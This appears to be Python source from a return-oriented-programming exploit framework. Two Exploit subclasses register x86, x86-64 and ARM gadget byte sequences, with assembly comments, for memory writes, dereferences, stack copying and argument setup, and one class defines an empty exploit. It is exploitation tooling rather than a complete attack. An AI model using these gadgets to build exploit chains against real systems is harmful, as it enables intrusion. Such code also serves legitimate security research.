def __init__(self): Exploit.__init__(self) # Good for FreeBSD # self.add_gadget("EM_386", "writemem", 4, # " 8b 44 24 08" + # mov eax,DWORD PTR [esp+0x8] \ # " 8b 4c 24 04" + # mov ecx,DWORD PTR [esp+0x4] \ # " 89 01" + # mov DWORD PTR [ecx],eax \ # " c3") # ret # self.add_gadget("EM_386", "cleanup", 3, # " 83 c4 0c" + # add esp,0xc \ # " c3") # ret # Good for Linux self.add_gadget("EM_386", "writemem", 4, " 8b 54 24 08" + # mov edx,DWORD PTR [esp+0x8] \ " 8b 44 24 04" + # mov eax,DWORD PTR [esp+0x4] \ " 89 10" + # mov DWORD PTR [eax],edx \ " c3") # ret # *(*(eax)+ecx) = ebx self.add_gadget("EM_386", "deref_write_with_offset", 4, " 58" + # pop eax \ " 5b" + # pop ebx \ " 59" + # pop ecx \ " 8b 00" + # mov eax,DWORD PTR [eax] \ " 89 1c 08" + # mov DWORD PTR [eax+ecx*1],ebx \ " c3") # ret self.add_gadget("EM_386", "deref_with_offset_and_save", 4, " 58" + # pop eax \ " 5b" + # pop ebx \ " 59" + # pop ecx \ " 8b 00" + # mov eax,DWORD PTR [eax] " 8b 04 18" + # mov eax,DWORD PTR [eax+ebx*1] \ " 89 01" + # mov DWORD PTR [ecx],eax \ " c3") # ret self.add_gadget("EM_386", "copy_to_stack", 4, " 5b" + # pop ebx \ " 59" + # pop ecx \ " 8b 1b" + # mov ebx,DWORD PTR [ebx] \ " 89 1c 0c" + # mov DWORD PTR [esp+ecx*1],ebx \ " c3") # ret self.add_gadget("EM_386", "cleanup", 4, " 5b" + # pop ebx \ " 5e" + # pop esi \ " 5f" + # pop edi \ " 5d" + # pop ebp \ " c3") # ret self.add_gadget("EM_386", "prepare_memcpy", 4, " 58" + # pop eax \ " 5e" + # pop esi \ " 01 e6" + # add esi,esp \ " 89 34 04" + # mov DWORD PTR [esp+eax*1],esi \ " c3") # ret self.add_gadget("EM_386", "custom_cleanup", 4, " 5b" + # pop ebx \ " 01 dc" + # add esp,ebx \ " c3") # ret # This gadget requires 6 useless parameters self.add_gadget("EM_X86_64", "writemem", 8, " 48 8b 54 24 10" + # mov rdx,QWORD PTR [rsp+0x10] \ " 48 8b 44 24 08" + # mov rax,QWORD PTR [rsp+0x8] \ " 48 89 10" + # mov QWORD PTR [rax],rdx \ " c3") # ret self.add_gadget("EM_X86_64", "writemem", 8, " 48 89 37" + # mov QWORD PTR [rdi],rsi \ " c3") # ret self.add_gadget("EM_X86_64", "cleanup", 6, " 5b" + # pop rbx \ " 5d" + # pop rbp \ " 41 5c" + # pop r12 \ " 41 5d" + # pop r13 \ " 41 5e" + # pop r14 \ " 41 5f" + # pop r15 \ " c3") # ret self.add_gadget("EM_X86_64", "args", None, " 4c 89 ea" + # mov rdx,r13 \ " 4c 89 f6" + # mov rsi,r14 \ " 44 89 ff" + # mov edi,r15d \ " 41 ff 14 dc") # call QWORD PTR [r12+rbx*8] self.add_gadget("EM_X86_64", "deref_write_with_offset", None, " 58" + # pop rax \ " 5b" + # pop rbx \ " 59" + # pop rcx \ " 48 8b 00" + # mov rax,QWORD PTR [rax] \ " 48 89 1c 08" + # mov QWORD PTR [rax+rcx*1],rbx \ " c3") # ret self.add_gadget("EM_X86_64", "deref_with_offset_and_save", None, " 58" + # pop rax \ " 5b" + # pop rbx \ " 59" + # pop rcx \ " 48 8b 00" + # mov rax,QWORD PTR [rax] \ " 48 8b 04 18" + # mov rax,QWORD PTR [rax+rbx*1] \ " 48 89 01" + # mov QWORD PTR [rcx],rax \ " c3") # ret self.add_gadget("EM_X86_64", "copy_to_stack", None, " 5b" + # pop rbx \ " 59" + # pop rcx \ " 48 8b 1b" + # mov rbx,QWORD PTR [rbx] \ " 48 89 1c 0c" + # mov QWORD PTR [rsp+rcx*1],rbx \ " c3") # ret self.add_gadget("EM_X86_64", "prepare_memcpy", None, " 5e" + # pop rsi \ " 48 01 e6" + # add rsi,rsp \ " c3") # ret self.add_gadget("EM_X86_64", "custom_cleanup", None, " 58" + # pop rax \ " 48 01 c4" + # add rsp,rax \ " c3") # ret self.add_gadget("EM_X86_64", "prepare_easy", None, " 5f" + # pop rdi \ " 5e" + # pop rsi \ " 5a" + # pop rdx \ " c3") # ret # Assume LE self.add_gadget("EM_ARM", "writemem", 4, " 00 10 80 e5" + # str r1, [r0] \ " 1e ff 2f e1") # bx lr # Better not use this due to a bug in QEMU #self.add_gadget("EM_ARM", "prepare_regs", None, # " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} self.add_gadget("EM_ARM", "prepare_regs", None, " f8 85 bd 08") # popeq {r3, r4, r5, r6, r7, r8, sl, pc} self.add_gadget("EM_ARM", "setup_args", None, " 07 00 a0 e1" + # mov r0, r7 \ " 08 10 a0 e1" + # mov r1, r8 \ " 0a 20 a0 e1" + # mov r2, sl \ " 01 40 84 e2" + # add r4, r4, #1 \ " 33 ff 2f e1" + # blx r3 \ " 06 00 54 e1" + # cmp r4, r6 \ " f7 ff ff 1a" + # bne 8604 <__libc_csu_init+0x38> \ " f8 85 bd e8") # pop {r3, r4, r5, r6, r7, r8, sl, pc} self.add_gadget("EM_ARM", "just_ret", None, " 1e ff 2f e1") # bx lr
def __init__(self): Exploit.__init__(self) self.empty_exploit = lambda: []